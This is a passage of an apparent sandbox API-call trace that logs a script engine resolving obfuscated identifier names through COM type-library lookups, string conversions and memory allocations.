pDummy=0x0) returned 0x0 [0068.426] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3ba24da, cbMultiByte=9, lpWideCharStr=0x144ea0, cchWideChar=10 | out: lpWideCharStr="AGDBwAwA") returned 9 [0068.426] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="AGDBwAwA", lHashVal=0x1003df, wFlags=0x3, ppTInfo=0x144e58, pDescKind=0x144e6c, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144e58*=0x0, pDescKind=0x144e6c*=0, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.426] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3ba24da, cbMultiByte=9, lpWideCharStr=0x144ea0, cchWideChar=10 | out: lpWideCharStr="AGDBwAwA") returned 9 [0068.426] ITypeComp:RemoteBind (in: This=0x665bd30, szName="AGDBwAwA", lHashVal=0x1003df, wFlags=0x3, ppTInfo=0x144e58, pDescKind=0x144e6c, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144e58*=0x0, pDescKind=0x144e6c*=0, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.426] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="AGDBwAwA") returned 0x1003df [0068.426] strcpy_s (in: _Dst=0x144e00, _DstSize=0x9, _Src="AGDBwAwA" | out: _Dst="AGDBwAwA") returned 0x0 [0068.426] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e00, cbMultiByte=9, lpWideCharStr=0x144c50, cchWideChar=9 | out: lpWideCharStr="AGDBwAwA") returned 9 [0068.426] IUnknown:AddRef (This=0x665ba50) returned 0xc [0068.426] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="AGDBwAwA", lHashVal=0x1003df, pfName=0x144d20, pBstrLibName=0x144c50 | out: pfName=0x144d20*=0, pBstrLibName=0x144c50) returned 0x0 [0068.426] IUnknown:Release (This=0x665ba50) returned 0xb [0068.426] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.426] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="AGDBwAwA", lHashVal=0x1003df, pfName=0x144d20, pBstrLibName=0x144c50 | out: pfName=0x144d20*=0, pBstrLibName=0x144c50) returned 0x0 [0068.426] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.426] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.426] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="AGDBwAwA", lHashVal=0x1003df, pfName=0x144d20, pBstrLibName=0x144c50 | out: pfName=0x144d20*=0, pBstrLibName=0x144c50) returned 0x0 [0068.426] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.426] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.426] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="AGDBwAwA", lHashVal=0x1003df, pfName=0x144d20, pBstrLibName=0x144c50 | out: pfName=0x144d20*=0, pBstrLibName=0x144c50) returned 0x0 [0068.426] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.426] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3ba24da, cbMultiByte=9, lpWideCharStr=0x144ea0, cchWideChar=10 | out: lpWideCharStr="AGDBwAwA") returned 9 [0068.426] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="AGDBwAwA", lHashVal=0x1003df, wFlags=0x3, ppTInfo=0x144e58, pDescKind=0x144e6c, ppFuncDesc=0x144e70, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144e58*=0x0, pDescKind=0x144e6c*=0, ppFuncDesc=0x144e70, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.426] IMalloc:Alloc (This=0x7fefec05380, cb=0x10) returned 0x67c2d60 [0068.427] _mbscpy_s (in: _Dst=0x67c2d60, _DstSizeInBytes=0x9, _Src=0x3ba24da | out: _Dst=0x67c2d60) returned 0x0 [0068.427] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_AGDBwAwA") returned 0x10dba7 [0068.427] strcpy_s (in: _Dst=0x144fb0, _DstSize=0x10, _Src="_B_var_AGDBwAwA" | out: _Dst="_B_var_AGDBwAwA") returned 0x0 [0068.427] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144fb0, cbMultiByte=16, lpWideCharStr=0x144e00, cchWideChar=16 | out: lpWideCharStr="_B_var_AGDBwAwA") returned 16 [0068.427] IUnknown:AddRef (This=0x665ba50) returned 0xc [0068.427] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_AGDBwAwA", lHashVal=0x10dba7, pfName=0x144ed0, pBstrLibName=0x144e00 | out: pfName=0x144ed0*=0, pBstrLibName=0x144e00) returned 0x0 [0068.427] IUnknown:Release (This=0x665ba50) returned 0xb [0068.427] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.427] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_AGDBwAwA", lHashVal=0x10dba7, pfName=0x144ed0, pBstrLibName=0x144e00 | out: pfName=0x144ed0*=0, pBstrLibName=0x144e00) returned 0x0 [0068.427] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.427] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.427] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_AGDBwAwA", lHashVal=0x10dba7, pfName=0x144ed0, pBstrLibName=0x144e00 | out: pfName=0x144ed0*=0, pBstrLibName=0x144e00) returned 0x0 [0068.427] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.427] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.427] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_AGDBwAwA", lHashVal=0x10dba7, pfName=0x144ed0, pBstrLibName=0x144e00 | out: pfName=0x144ed0*=0, pBstrLibName=0x144e00) returned 0x0 [0068.427] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.427] IUnknown:AddRef (This=0x665ba50) returned 0xc [0068.427] IUnknown:Release (This=0x665ba50) returned 0xb [0068.427] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cc18aa, cbMultiByte=16, lpWideCharStr=0x144e60, cchWideChar=17 | out: lpWideCharStr="_B_var_AGDBwAwA") returned 16 [0068.427] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_AGDBwAwA", lHashVal=0x10dba7, wFlags=0x3, ppTInfo=0x144e18, pDescKind=0x144e2c, ppFuncDesc=0x144e30, ppVarDesc=0x41005f00720061, ppTypeComp=0x77004200000000, pDummy=0x0 | out: ppTInfo=0x144e18*=0x0, pDescKind=0x144e2c*=0, ppFuncDesc=0x144e30, ppVarDesc=0x41005f00720061, ppTypeComp=0x77004200000000, pDummy=0x0) returned 0x0 [0068.427] _mbscpy_s (in: _Dst=0x145020, _DstSizeInBytes=0x9, _Src=0x3ba24da | out: _Dst=0x145020) returned 0x0 [0068.427] ITypeComp:RemoteBind (in: This=0x665ba60, szName="kGUAQxG", lHashVal=0x104876, wFlags=0x3, ppTInfo=0x144e58, pDescKind=0x144e6c, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144e58*=0x0, pDescKind=0x144e6c*=0, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.428] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3ba2506, cbMultiByte=8, lpWideCharStr=0x144ea0, cchWideChar=9 | out: lpWideCharStr="kGUAQxG") returned 8 [0068.428] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="kGUAQxG", lHashVal=0x104876, wFlags=0x3, ppTInfo=0x144e58, pDescKind=0x144e6c, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144e58*=0x0, pDescKind=0x144e6c*=0, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.428] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3ba2506, cbMultiByte=8, lpWideCharStr=0x144ea0, cchWideChar=9 | out: lpWideCharStr="kGUAQxG") returned 8 [0068.428] ITypeComp:RemoteBind (in: This=0x665bd30, szName="kGUAQxG", lHashVal=0x104876, wFlags=0x3, ppTInfo=0x144e58, pDescKind=0x144e6c, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144e58*=0x0, pDescKind=0x144e6c*=0, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.428] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="kGUAQxG") returned 0x104876 [0068.428] strcpy_s (in: _Dst=0x144e00, _DstSize=0x8, _Src="kGUAQxG" | out: _Dst="kGUAQxG") returned 0x0 [0068.428] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e00, cbMultiByte=8, lpWideCharStr=0x144c50, cchWideChar=8 | out: lpWideCharStr="kGUAQxG") returned 8 [0068.428] IUnknown:AddRef (This=0x665ba50) returned 0xc [0068.428] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="kGUAQxG", lHashVal=0x104876, pfName=0x144d20, pBstrLibName=0x144c50 | out: pfName=0x144d20*=0, pBstrLibName=0x144c50) returned 0x0 [0068.428] IUnknown:Release (This=0x665ba50) returned 0xb [0068.428] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.428] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="kGUAQxG", lHashVal=0x104876, pfName=0x144d20, pBstrLibName=0x144c50 | out: pfName=0x144d20*=0, pBstrLibName=0x144c50) returned 0x0 [0068.428] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.428] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.428] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="kGUAQxG", lHashVal=0x104876, pfName=0x144d20, pBstrLibName=0x144c50 | out: pfName=0x144d20*=0, pBstrLibName=0x144c50) returned 0x0 [0068.428] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.428] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.428] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="kGUAQxG", lHashVal=0x104876, pfName=0x144d20, pBstrLibName=0x144c50 | out: pfName=0x144d20*=0, pBstrLibName=0x144c50) returned 0x0 [0068.428] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.428] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3ba2506, cbMultiByte=8, lpWideCharStr=0x144ea0, cchWideChar=9 | out: lpWideCharStr="kGUAQxG") returned 8 [0068.428] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="kGUAQxG", lHashVal=0x104876, wFlags=0x3, ppTInfo=0x144e58, pDescKind=0x144e6c, ppFuncDesc=0x144e70, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144e58*=0x0, pDescKind=0x144e6c*=0, ppFuncDesc=0x144e70, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.428] IMalloc:Alloc (This=0x7fefec05380, cb=0xf) returned 0x67c2d60 [0068.428] _mbscpy_s (in: _Dst=0x67c2d60, _DstSizeInBytes=0x8, _Src=0x3ba2506 | out: _Dst=0x67c2d60) returned 0x0 [0068.429] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_kGUAQxG") returned 0x103c79 [0068.429] strcpy_s (in: _Dst=0x144fb0, _DstSize=0xf, _Src="_B_var_kGUAQxG" | out: _Dst="_B_var_kGUAQxG") returned 0x0 [0068.429] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144fb0, cbMultiByte=15, lpWideCharStr=0x144e00, cchWideChar=15 | out: lpWideCharStr="_B_var_kGUAQxG") returned 15 [0068.429] IUnknown:AddRef (This=0x665ba50) returned 0xc [0068.429] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_kGUAQxG", lHashVal=0x103c79, pfName=0x144ed0, pBstrLibName=0x144e00 | out: pfName=0x144ed0*=0, pBstrLibName=0x144e00) returned 0x0 [0068.429] IUnknown:Release (This=0x665ba50) returned 0xb [0068.429] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.429] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_kGUAQxG", lHashVal=0x103c79, pfName=0x144ed0, pBstrLibName=0x144e00 | out: pfName=0x144ed0*=0, pBstrLibName=0x144e00) returned 0x0 [0068.429] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.429] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.429] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_kGUAQxG", lHashVal=0x103c79, pfName=0x144ed0, pBstrLibName=0x144e00 | out: pfName=0x144ed0*=0, pBstrLibName=0x144e00) returned 0x0 [0068.429] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.429] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.429] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_kGUAQxG", lHashVal=0x103c79, pfName=0x144ed0, pBstrLibName=0x144e00 | out: pfName=0x144ed0*=0, pBstrLibName=0x144e00) returned 0x0 [0068.429] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.429] IUnknown:AddRef (This=0x665ba50) returned 0xc [0068.429] IUnknown:Release (This=0x665ba50) returned 0xb [0068.429] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cc18da, cbMultiByte=15, lpWideCharStr=0x144e60, cchWideChar=16 | out: lpWideCharStr="_B_var_kGUAQxG") returned 15 [0068.429] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_kGUAQxG", lHashVal=0x103c79, wFlags=0x3, ppTInfo=0x144e18, pDescKind=0x144e2c, ppFuncDesc=0x144e30, ppVarDesc=0x6b005f00720061, ppTypeComp=0x51004100000000, pDummy=0x0 | out: ppTInfo=0x144e18*=0x0, pDescKind=0x144e2c*=0, ppFuncDesc=0x144e30, ppVarDesc=0x6b005f00720061, ppTypeComp=0x51004100000000, pDummy=0x0) returned 0x0 [0068.429] _mbscpy_s (in: _Dst=0x145020, _DstSizeInBytes=0x8, _Src=0x3ba2506 | out: _Dst=0x145020) returned 0x0 [0068.429] ITypeComp:RemoteBind (in: This=0x665ba60, szName="aBADAAwD", lHashVal=0x107596, wFlags=0x3, ppTInfo=0x144e58, pDescKind=0x144e6c, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144e58*=0x0, pDescKind=0x144e6c*=0, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.430] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3ba252e, cbMultiByte=9, lpWideCharStr=0x144ea0, cchWideChar=10 | out: lpWideCharStr="aBADAAwD") returned 9 [0068.430] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="aBADAAwD", lHashVal=0x107596, wFlags=0x3, ppTInfo=0x144e58, pDescKind=0x144e6c, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144e58*=0x0, pDescKind=0x144e6c*=0, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.430] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3ba252e, cbMultiByte=9, lpWideCharStr=0x144ea0, cchWideChar=10 | out: lpWideCharStr="aBADAAwD") returned 9 [0068.430] ITypeComp:RemoteBind (in: This=0x665bd30, szName="aBADAAwD", lHashVal=0x107596, wFlags=0x3, ppTInfo=0x144e58, pDescKind=0x144e6c, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144e58*=0x0, pDescKind=0x144e6c*=0, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.430] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="aBADAAwD") returned 0x107596 [0068.430] strcpy_s (in: _Dst=0x144e00, _DstSize=0x9, _Src="aBADAAwD" | out: _Dst="aBADAAwD") returned 0x0 [0068.430] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e00, cbMultiByte=9, lpWideCharStr=0x144c50, cchWideChar=9 | out: lpWideCharStr="aBADAAwD") returned 9 [0068.430] IUnknown:AddRef (This=0x665ba50) returned 0xc [0068.430] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="aBADAAwD", lHashVal=0x107596, pfName=0x144d20, pBstrLibName=0x144c50 | out: pfName=0x144d20*=0, pBstrLibName=0x144c50) returned 0x0 [0068.430] IUnknown:Release (This=0x665ba50) returned 0xb [0068.430] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.430] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="aBADAAwD", lHashVal=0x107596, pfName=0x144d20, pBstrLibName=0x144c50 | out: pfName=0x144d20*=0, pBstrLibName=0x144c50) returned 0x0 [0068.430] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.430] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.430] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="aBADAAwD", lHashVal=0x107596, pfName=0x144d20, pBstrLibName=0x144c50 | out: pfName=0x144d20*=0, pBstrLibName=0x144c50) returned 0x0 [0068.430] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.430] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.430] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="aBADAAwD", lHashVal=0x107596, pfName=0x144d20, pBstrLibName=0x144c50 | out: pfName=0x144d20*=0, pBstrLibName=0x144c50) returned 0x0 [0068.430] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.430] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3ba252e, cbMultiByte=9, lpWideCharStr=0x144ea0, cchWideChar=10 | out: lpWideCharStr="aBADAAwD") returned 9 [0068.430] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="aBADAAwD", lHashVal=0x107596, wFlags=0x3, ppTInfo=0x144e58, pDescKind=0x144e6c, ppFuncDesc=0x144e70, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144e58*=0x0, pDescKind=0x144e6c*=0, ppFuncDesc=0x144e70, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.430] IMalloc:Alloc (This=0x7fefec05380, cb=0x10) returned 0x67c2d60 [0068.431] _mbscpy_s (in: _Dst=0x67c2d60, _DstSizeInBytes=0x9, _Src=0x3ba252e | out: _Dst=0x67c2d60) returned 0x0 [0068.431] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_aBADAAwD") returned 0x104d1f [0068.431] strcpy_s (in: _Dst=0x144fb0, _DstSize=0x10, _Src="_B_var_aBADAAwD" | out: _Dst="_B_var_aBADAAwD") returned 0x0 [0068.431] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144fb0, cbMultiByte=16, lpWideCharStr=0x144e00, cchWideChar=16 | out: lpWideCharStr="_B_var_aBADAAwD") returned 16 [0068.431] IUnknown:AddRef (This=0x665ba50) returned 0xc [0068.431] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_aBADAAwD", lHashVal=0x104d1f, pfName=0x144ed0, pBstrLibName=0x144e00 | out: pfName=0x144ed0*=0, pBstrLibName=0x144e00) returned 0x0 [0068.431] IUnknown:Release (This=0x665ba50) returned 0xb [0068.431] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.431] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_aBADAAwD", lHashVal=0x104d1f, pfName=0x144ed0, pBstrLibName=0x144e00 | out: pfName=0x144ed0*=0, pBstrLibName=0x144e00) returned 0x0 [0068.431] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.431] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.431] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_aBADAAwD", lHashVal=0x104d1f, pfName=0x144ed0, pBstrLibName=0x144e00 | out: pfName=0x144ed0*=0, pBstrLibName=0x144e00) returned 0x0 [0068.431] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.431] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.431] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_aBADAAwD", lHashVal=0x104d1f, pfName=0x144ed0, pBstrLibName=0x144e00 | out: pfName=0x144ed0*=0, pBstrLibName=0x144e00) returned 0x0 [0068.431] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.431] IUnknown:AddRef (This=0x665ba50) returned 0xc [0068.431] IUnknown:Release (This=0x665ba50) returned 0xb [0068.431] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cc190a, cbMultiByte=16, lpWideCharStr=0x144e60, cchWideChar=17 | out: lpWideCharStr="_B_var_aBADAAwD") returned 16 [0068.431] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_aBADAAwD", lHashVal=0x104d1f, wFlags=0x3, ppTInfo=0x144e18, pDescKind=0x144e2c, ppFuncDesc=0x144e30, ppVarDesc=0x61005f00720061, ppTypeComp=0x41004400000000, pDummy=0x0 | out: ppTInfo=0x144e18*=0x0, pDescKind=0x144e2c*=0, ppFuncDesc=0x144e30, ppVarDesc=0x61005f00720061, ppTypeComp=0x41004400000000, pDummy=0x0) returned 0x0 [0068.431] _mbscpy_s (in: _Dst=0x145020, _DstSizeInBytes=0x9, _Src=0x3ba252e | out: _Dst=0x145020) returned 0x0 [0068.431] ITypeComp:RemoteBind (in: This=0x665ba60, szName="uUUwDBwB", lHashVal=0x10664f, wFlags=0x3, ppTInfo=0x144e58, pDescKind=0x144e6c, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144e58*=0x0, pDescKind=0x144e6c*=0, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.432] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3ba255a, cbMultiByte=9, lpWideCharStr=0x144ea0, cchWideChar=10 | out: lpWideCharStr="uUUwDBwB") returned 9 [0068.432] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="uUUwDBwB", lHashVal=0x10664f, wFlags=0x3, ppTInfo=0x144e58, pDescKind=0x144e6c, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144e58*=0x0, pDescKind=0x144e6c*=0, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.432] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3ba255a, cbMultiByte=9, lpWideCharStr=0x144ea0, cchWideChar=10 | out: lpWideCharStr="uUUwDBwB") returned 9 [0068.432] ITypeComp:RemoteBind (in: This=0x665bd30, szName="uUUwDBwB", lHashVal=0x10664f, wFlags=0x3, ppTInfo=0x144e58, pDescKind=0x144e6c, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144e58*=0x0, pDescKind=0x144e6c*=0, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.432] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="uUUwDBwB") returned 0x10664f [0068.432] strcpy_s (in: _Dst=0x144e00, _DstSize=0x9, _Src="uUUwDBwB" | out: _Dst="uUUwDBwB") returned 0x0 [0068.432] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e00, cbMultiByte=9, lpWideCharStr=0x144c50, cchWideChar=9 | out: lpWideCharStr="uUUwDBwB") returned 9 [0068.432] IUnknown:AddRef (This=0x665ba50) returned 0xc [0068.432] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="uUUwDBwB", lHashVal=0x10664f, pfName=0x144d20, pBstrLibName=0x144c50 | out: pfName=0x144d20*=0, pBstrLibName=0x144c50) returned 0x0 [0068.432] IUnknown:Release (This=0x665ba50) returned 0xb [0068.432] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.432] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="uUUwDBwB", lHashVal=0x10664f, pfName=0x144d20, pBstrLibName=0x144c50 | out: pfName=0x144d20*=0, pBstrLibName=0x144c50) returned 0x0 [0068.432] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.432] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.432] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="uUUwDBwB", lHashVal=0x10664f, pfName=0x144d20, pBstrLibName=0x144c50 | out: pfName=0x144d20*=0, pBstrLibName=0x144c50) returned 0x0 [0068.432] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.432] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.432] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="uUUwDBwB", lHashVal=0x10664f, pfName=0x144d20, pBstrLibName=0x144c50 | out: pfName=0x144d20*=0, pBstrLibName=0x144c50) returned 0x0 [0068.432] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.432] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3ba255a, cbMultiByte=9, lpWideCharStr=0x144ea0, cchWideChar=10 | out: lpWideCharStr="uUUwDBwB") returned 9 [0068.432] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="uUUwDBwB", lHashVal=0x10664f, wFlags=0x3, ppTInfo=0x144e58, pDescKind=0x144e6c, ppFuncDesc=0x144e70, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144e58*=0x0, pDescKind=0x144e6c*=0, ppFuncDesc=0x144e70, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.432] IMalloc:Alloc (This=0x7fefec05380, cb=0x10) returned 0x67c2d60 [0068.433] _mbscpy_s (in: _Dst=0x67c2d60, _DstSizeInBytes=0x9, _Src=0x3ba255a | out: _Dst=0x67c2d60) returned 0x0 [0068.433] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_uUUwDBwB") returned 0x103dd8 [0068.433] strcpy_s (in: _Dst=0x144fb0, _DstSize=0x10, _Src="_B_var_uUUwDBwB" | out: _Dst="_B_var_uUUwDBwB") returned 0x0 [0068.433] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144fb0, cbMultiByte=16, lpWideCharStr=0x144e00, cchWideChar=16 | out: lpWideCharStr="_B_var_uUUwDBwB") returned 16 [0068.433] IUnknown:AddRef (This=0x665ba50) returned 0xc [0068.433] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_uUUwDBwB", lHashVal=0x103dd8, pfName=0x144ed0, pBstrLibName=0x144e00 | out: pfName=0x144ed0*=0, pBstrLibName=0x144e00) returned 0x0 [0068.433] IUnknown:Release (This=0x665ba50) returned 0xb [0068.433] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.433] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_uUUwDBwB", lHashVal=0x103dd8, pfName=0x144ed0, pBstrLibName=0x144e00 | out: pfName=0x144ed0*=0, pBstrLibName=0x144e00) returned 0x0 [0068.433] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.433] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.433] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_uUUwDBwB", lHashVal=0x103dd8, pfName=0x144ed0, pBstrLibName=0x144e00 | out: pfName=0x144ed0*=0, pBstrLibName=0x144e00) returned 0x0 [0068.433] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.433] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.433] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_uUUwDBwB", lHashVal=0x103dd8, pfName=0x144ed0, 